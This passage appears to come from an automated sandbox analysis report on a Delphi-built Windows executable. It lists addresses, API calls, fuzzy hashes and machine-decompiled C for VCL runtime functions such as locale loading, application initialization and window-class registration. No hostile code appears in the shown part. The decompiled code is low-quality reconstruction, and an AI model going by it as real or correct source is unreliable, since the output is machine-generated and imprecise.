                                                                                0x00405e32
                                                                                0x00405e4b
                                                                                0x00405e4f
                                                                                0x00405e50
                                                                                0x00405e51
                                                                                0x00405e61
                                                                                0x00405e66
                                                                                0x00405e6a
                                                                                0x00405e6c
                                                                                0x00405e81
                                                                                0x00405e85
                                                                                0x00405e86
                                                                                0x00405e87
                                                                                0x00405e97
                                                                                0x00405e9c
                                                                                0x00405e9c
                                                                                0x00405e6a
                                                                                0x00405e32
                                                                                0x00000000
                                                                                0x00405dfb

                                                                                APIs
                                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405D94
                                                                                • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA1
                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DA7
                                                                                • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD2
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E19
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E29
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E51
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E61
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405E87
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405E97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                • API String ID: 1599918012-2375825460
                                                                                • Opcode ID: cb28f160dafa1149e6bab2272285a120a5385a2738fad10cdcded8b14b4c15f3
                                                                                • Instruction ID: 1996122f5b3b820df51850e3b8abf2c553d6293b2967b506f70bd3d03d36238e
                                                                                • Opcode Fuzzy Hash: cb28f160dafa1149e6bab2272285a120a5385a2738fad10cdcded8b14b4c15f3
                                                                                • Instruction Fuzzy Hash: 82315071E0061C2AFB25D6B8DC8ABEF66AC8B04384F4441F7B644F61C1DA789F848F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00440BF4, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E00440BF4(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x440c7a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x487b6c =  *0x487b6c - 1;
				if( *0x487b6c < 0) {
					 *0x487b68 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x487b68;
					E004409C0(_t16, __edi,  *0x487b68);
					_t6 =  *0x431114; // 0x431160
					E004135D4(_t6, _t16, _t17,  *0x487b68);
					_t8 =  *0x431114; // 0x431160
					E00413674(_t8, _t16, _t17, _t31);
					_t21 =  *0x431114; // 0x431160
					_t10 =  *0x442280; // 0x4422cc
					E00413620(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x431114; // 0x431160
					_t12 =  *0x440c84; // 0x440cd0
					E00413620(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x431114; // 0x431160
					_t14 =  *0x440e38; // 0x440e84
					E00413620(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x440c81);
				return 0;
			}















                                                                                0x00440bf4
                                                                                0x00440bf4
                                                                                0x00440bf9
                                                                                0x00440bfa
                                                                                0x00440bff
                                                                                0x00440c02
                                                                                0x00440c05
                                                                                0x00440c0c
                                                                                0x00440c1c
                                                                                0x00440c1c
                                                                                0x00440c23
                                                                                0x00440c28
                                                                                0x00440c2d
                                                                                0x00440c32
                                                                                0x00440c37
                                                                                0x00440c3c
                                                                                0x00440c42
                                                                                0x00440c47
                                                                                0x00440c4c
                                                                                0x00440c52
                                                                                0x00440c57
                                                                                0x00440c5c
                                                                                0x00440c62
                                                                                0x00440c67
                                                                                0x00440c67
                                                                                0x00440c6e
                                                                                0x00440c71
                                                                                0x00440c74
                                                                                0x00440c79

                                                                                APIs
                                                                                • GetVersion.KERNEL32(00000000,00440C7A), ref: 00440C0E
                                                                                  • Part of subcall function 004409C0: GetCurrentProcessId.KERNEL32(?,00000000,00440B38), ref: 004409E1
                                                                                  • Part of subcall function 004409C0: GlobalAddAtomA.KERNEL32 ref: 00440A14
                                                                                  • Part of subcall function 004409C0: GetCurrentThreadId.KERNEL32 ref: 00440A2F
                                                                                  • Part of subcall function 004409C0: GlobalAddAtomA.KERNEL32 ref: 00440A65
                                                                                  • Part of subcall function 004409C0: RegisterClipboardFormatA.USER32 ref: 00440A7B
                                                                                  • Part of subcall function 004409C0: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00440AFF
                                                                                  • Part of subcall function 004409C0: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440B10
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                                                • String ID:
                                                                                • API String ID: 3775504709-0
                                                                                • Opcode ID: 84fd9255da5c0ece7f2a95a703be49b491e2bf8b0af51a77d515eadb5685d01d
                                                                                • Instruction ID: e67370ff2c8a915d09f98d7b992bbfe6c99b42158f3494a24295611e547c08d6
                                                                                • Opcode Fuzzy Hash: 84fd9255da5c0ece7f2a95a703be49b491e2bf8b0af51a77d515eadb5685d01d
                                                                                • Instruction Fuzzy Hash: 0DF0F6B92041009FE720EF26EE938957795E74A705791053AF60043B72CA7CEC61DB6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00454818, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E00454818(intOrPtr _a4) {
				intOrPtr _t26;

				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
				_push(_t26); // executed
				L00406CF8(); // executed
				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
				return _t26;
			}




                                                                                0x00454824
                                                                                0x0045482e
                                                                                0x00454837
                                                                                0x0045483e
                                                                                0x00454841
                                                                                0x00454842
                                                                                0x0045484d
                                                                                0x00454851

                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00454842
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 5ea0eff2d8d2a340c07e9b1a96fb3f22a4118a99491f868511381c8acdcdbb2f
                                                                                • Instruction ID: 8e3812bb2dbae8fdc8bd2ff27f39f94ffe5d655063029f50f454f61ff6dda21e
                                                                                • Opcode Fuzzy Hash: 5ea0eff2d8d2a340c07e9b1a96fb3f22a4118a99491f868511381c8acdcdbb2f
                                                                                • Instruction Fuzzy Hash: BDF0C579205608AFDB40DF9DC588D4AFBE8FB4C260B458195BD88CB321C234FE808F90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00454384, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 130windowregistryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 42%
                                                                                			E00454384(void* __eax, void* __ebx, void* __ecx) {
				struct _WNDCLASSA _v44;
				char _v48;
				char* _t22;
				long _t23;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				intOrPtr* _t28;
				signed int _t31;
				intOrPtr* _t32;
				signed int _t35;
				struct HINSTANCE__* _t36;
				void* _t38;
				CHAR* _t39;
				struct HWND__* _t40;
				char* _t46;
				char* _t51;
				long _t54;
				long _t58;
				struct HINSTANCE__* _t61;
				intOrPtr _t63;
				void* _t68;
				struct HMENU__* _t69;
				intOrPtr _t76;
				void* _t82;
				short _t87;

				_v48 = 0;
				_t68 = __eax;
				_push(_t82);
				_push(0x45451b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x454522);
					return E00404320( &_v48);
				}
				_t22 =  *0x486cc4; // 0x487048
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E0041C940(E004548A0, __eax); // executed
				 *(_t68 + 0x40) = _t23;
				_t25 =  *0x46bc2c; // 0x45406c
				_t26 =  *0x487714; // 0x400000
				if(GetClassInfoA(_t26, _t25,  &_v44) == 0) {
					_t61 =  *0x487714; // 0x400000
					 *0x46bc18 = _t61;
					_t87 = RegisterClassA(0x46bc08);
					if(_t87 == 0) {
						_t63 =  *0x486a78; // 0x41cc54
						E00406520(_t63,  &_v48);
						E0040A0B0(_v48, 1);
						E00403D80();
					}
				}
				_t28 =  *0x486b30; // 0x487a94
				_t31 =  *((intOrPtr*)( *_t28))(0) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_t32 =  *0x486b30; // 0x487a94
				_t35 =  *((intOrPtr*)( *_t32))(1, _t31) >> 1;
				if(_t87 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t35);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t36 =  *0x487714; // 0x400000
				_push(_t36);
				_push(0);
				_t7 = _t68 + 0x8c; // 0x27800044
				_t38 = E004047D0( *_t7);
				_t39 =  *0x46bc2c; // 0x45406c, executed
				_t40 = E00407288(_t39, 0x84ca0000, _t38); // executed
				 *(_t68 + 0x30) = _t40;
				_t9 = _t68 + 0x8c; // 0x44c59c
				E00404320(_t9);
				 *((char*)(_t68 + 0xa4)) = 1;
				_t11 = _t68 + 0x40; // 0x10940000
				_t12 = _t68 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t46 =  *0x486b9c; // 0x487b68
				if( *_t46 != 0) {
					_t54 = E00454F78(_t68);
					_t13 = _t68 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t54); // executed
					_t58 = E00454F78(_t68);
					_t14 = _t68 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t58); // executed
				}
				_t15 = _t68 + 0x30; // 0xe
				_t69 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t69, 0xf030, 0);
				DeleteMenu(_t69, 0xf000, 0);
				_t51 =  *0x486b9c; // 0x487b68
				if( *_t51 != 0) {
					DeleteMenu(_t69, 0xf010, 0);
				}
				goto L13;
			}




























                                                                                0x0045438d
                                                                                0x00454390
                                                                                0x00454394
                                                                                0x00454395
                                                                                0x0045439a
                                                                                0x0045439d
                                                                                0x004543a7
                                                                                0x00454505
                                                                                0x00454507
                                                                                0x0045450a
                                                                                0x0045450d
                                                                                0x0045451a
                                                                                0x0045451a
                                                                                0x004543ad
                                                                                0x004543b5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004543c1
                                                                                0x004543c6
                                                                                0x004543cd
                                                                                0x004543d3
                                                                                0x004543e0
                                                                                0x004543e2
                                                                                0x004543e7
                                                                                0x004543f6
                                                                                0x004543f9
                                                                                0x004543fe
                                                                                0x00454403
                                                                                0x00454412
                                                                                0x00454417
                                                                                0x00454417
                                                                                0x004543f9
                                                                                0x0045441e
                                                                                0x00454427
                                                                                0x00454429
                                                                                0x0045442b
                                                                                0x0045442b
                                                                                0x00454431
                                                                                0x0045443a
                                                                                0x0045443c
                                                                                0x0045443e
                                                                                0x0045443e
                                                                                0x00454441
                                                                                0x00454442
                                                                                0x00454444
                                                                                0x00454446
                                                                                0x00454448
                                                                                0x0045444a
                                                                                0x0045444f
                                                                                0x00454450
                                                                                0x00454452
                                                                                0x00454458
                                                                                0x00454464
                                                                                0x00454469
                                                                                0x0045446e
                                                                                0x00454471
                                                                                0x00454477
                                                                                0x0045447c
                                                                                0x00454483
                                                                                0x00454489
                                                                                0x0045448d
                                                                                0x00454492
                                                                                0x0045449a
                                                                                0x0045449e
                                                                                0x004544ab
                                                                                0x004544af
                                                                                0x004544b6
                                                                                0x004544be
                                                                                0x004544c2
                                                                                0x004544c2
                                                                                0x004544c9
                                                                                0x004544d2
                                                                                0x004544dc
                                                                                0x004544e9
                                                                                0x004544ee
                                                                                0x004544f6
                                                                                0x00454500
                                                                                0x00454500
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 0041C940: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C95E
                                                                                • GetClassInfoA.USER32 ref: 004543D9
                                                                                • RegisterClassA.USER32 ref: 004543F1
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                • SetWindowLongA.USER32 ref: 0045448D
                                                                                • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 004544AF
                                                                                • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544C2
                                                                                • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544CD
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544DC
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544E9
                                                                                • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 00454500
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                • String ID: HpH$h{H$l@E
                                                                                • API String ID: 2103932818-3227393362
                                                                                • Opcode ID: 6ab2acdc5c7d5719350be9b99716f18ecc9a494cbdb557a77b08e715daafbf8c
                                                                                • Instruction ID: 6e4c490b6783f64956c43e3ed911a1460050a66f9724ccd8e5ea5c6e1907debb
                                                                                • Opcode Fuzzy Hash: 6ab2acdc5c7d5719350be9b99716f18ecc9a494cbdb557a77b08e715daafbf8c
                                                                                • Instruction Fuzzy Hash: 2A416270744200ABE710EF69DC81F6A37A8AB45308F55457AFE00EF2D3EA78B8448769
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004409C0, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103registrylibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E004409C0(void* __ebx, void* __edi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				intOrPtr _t25;
				char _t29;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t53;
				struct HINSTANCE__* _t63;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr _t83;
				void* _t87;

				_v20 = 0;
				_v8 = 0;
				_push(_t87);
				_push(0x440b38);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87 + 0xffffffe0;
				_v16 = GetCurrentProcessId();
				_v12 = 0;
				E004092A0("Delphi%.8X", 0,  &_v16,  &_v8);
				E00404374(0x487b74, _v8);
				_t25 =  *0x487b74; // 0x2290e78
				 *0x487b70 = GlobalAddAtomA(E004047D0(_t25));
				_t29 =  *0x487714; // 0x400000
				_v36 = _t29;
				_v32 = 0;
				_v28 = GetCurrentThreadId();
				_v24 = 0;
				E004092A0("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
				E00404374(0x487b78, _v20);
				_t35 =  *0x487b78; // 0x2290e94
				 *0x487b72 = GlobalAddAtomA(E004047D0(_t35));
				_t38 =  *0x487b78; // 0x2290e94
				 *0x487b7c = RegisterClipboardFormatA(E004047D0(_t38));
				 *0x487bb4 = E004141BC(1);
				E004405C4();
				 *0x487b64 = E004403EC(1, 1);
				_t47 = E00452F98(1, __edi);
				_t78 =  *0x486dac; // 0x487c00
				 *_t78 = _t47;
				_t49 = E0045407C(0, 1);
				_t80 =  *0x486c60; // 0x487bfc
				 *_t80 = _t49;
				_t50 =  *0x486c60; // 0x487bfc
				E00455B88( *_t50, 1);
				_t53 =  *0x4302b8; // 0x4302bc
				E00413760(_t53, 0x4327b4, 0x4327c4);
				_t63 = GetModuleHandleA("USER32");
				if(_t63 != 0) {
					 *0x46b8cc = GetProcAddress(_t63, "AnimateWindow");
				}
				_pop(_t83);
				 *[fs:eax] = _t83;
				_push(0x440b3f);
				E00404320( &_v20);
				return E00404320( &_v8);
			}
























                                                                                0x004409c9
                                                                                0x004409cc
                                                                                0x004409d1
                                                                                0x004409d2
                                                                                0x004409d7
                                                                                0x004409da
                                                                                0x004409e6
                                                                                0x004409e9
                                                                                0x004409f7
                                                                                0x00440a04
                                                                                0x00440a09
                                                                                0x00440a19
                                                                                0x00440a23
                                                                                0x00440a28
                                                                                0x00440a2b
                                                                                0x00440a34
                                                                                0x00440a37
                                                                                0x00440a48
                                                                                0x00440a55
                                                                                0x00440a5a
                                                                                0x00440a6a
                                                                                0x00440a70
                                                                                0x00440a80
                                                                                0x00440a91
                                                                                0x00440a96
                                                                                0x00440aa7
                                                                                0x00440ab5
                                                                                0x00440aba
                                                                                0x00440ac0
                                                                                0x00440acb
                                                                                0x00440ad0
                                                                                0x00440ad6
                                                                                0x00440ad8
                                                                                0x00440ae1
                                                                                0x00440af0
                                                                                0x00440af5
                                                                                0x00440b04
                                                                                0x00440b08
                                                                                0x00440b15
                                                                                0x00440b15
                                                                                0x00440b1c
                                                                                0x00440b1f
                                                                                0x00440b22
                                                                                0x00440b2a
                                                                                0x00440b37

                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00440B38), ref: 004409E1
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00440A14
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00440A2F
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00440A65
                                                                                • RegisterClipboardFormatA.USER32 ref: 00440A7B
                                                                                  • Part of subcall function 004141BC: RtlInitializeCriticalSection.KERNEL32(004119BC,?,?,00440A91,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 004141DB
                                                                                  • Part of subcall function 004405C4: SetErrorMode.KERNEL32(00008000), ref: 004405DD
                                                                                  • Part of subcall function 004405C4: GetModuleHandleA.KERNEL32(USER32,00000000,0044072A,?,00008000), ref: 00440601
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0044060E
                                                                                  • Part of subcall function 004405C4: LoadLibraryA.KERNEL32(IMM32.DLL,00000000,0044072A,?,00008000), ref: 0044062A
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0044064C
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00440661
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00440676
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0044068B
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004406A0
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004406B5
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004406CA
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004406DF
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 004406F4
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440709
                                                                                  • Part of subcall function 004405C4: SetErrorMode.KERNEL32(?,00440731,00008000), ref: 00440724
                                                                                  • Part of subcall function 00452F98: GetKeyboardLayout.USER32(00000000), ref: 00452FDD
                                                                                  • Part of subcall function 00452F98: 72E7AC50.USER32(00000000,?,?,00000000,?,00440ABA,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00453032
                                                                                  • Part of subcall function 00452F98: 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00440ABA,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 0045303C
                                                                                  • Part of subcall function 00452F98: 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00440ABA,00000000,00000000,?,00000000,?,00000000), ref: 00453047
                                                                                  • Part of subcall function 0045407C: LoadIconA.USER32(00400000,MAINICON), ref: 00454161
                                                                                  • Part of subcall function 0045407C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00454193
                                                                                  • Part of subcall function 0045407C: OemToCharA.USER32(?,?), ref: 004541A6
                                                                                  • Part of subcall function 0045407C: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 004541E6
                                                                                • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00440AFF
                                                                                • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440B10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                                                                • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                                • API String ID: 2159221912-1126952177
                                                                                • Opcode ID: 1018ce0efc8efdce6cc6525a3870734bce1b65eff92e5894b72814d9c40937eb
                                                                                • Instruction ID: cf8f2e16a86b900fa348f6b4382c58bee2ff4fefe60cf267411a8d94096d9238
                                                                                • Opcode Fuzzy Hash: 1018ce0efc8efdce6cc6525a3870734bce1b65eff92e5894b72814d9c40937eb
                                                                                • Instruction Fuzzy Hash: 484160B0A042449FD700EFB9D992A4E77B9EB49308B50497FF500E73A2DB38A910CB5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045407C, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 94%
                                                                                			E0045407C(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403918(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E0041B8BC(_t91, 0);
				_t42 =  *0x486be0; // 0x46b468
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x486be0; // 0x46b468
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x4556b0;
				}
				_t43 =  *0x486c7c; // 0x46b470
				_t109 =  *((short*)(_t43 + 2));
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x486c7c; // 0x46b470
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E004558A8;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E00403584(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E00403584(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
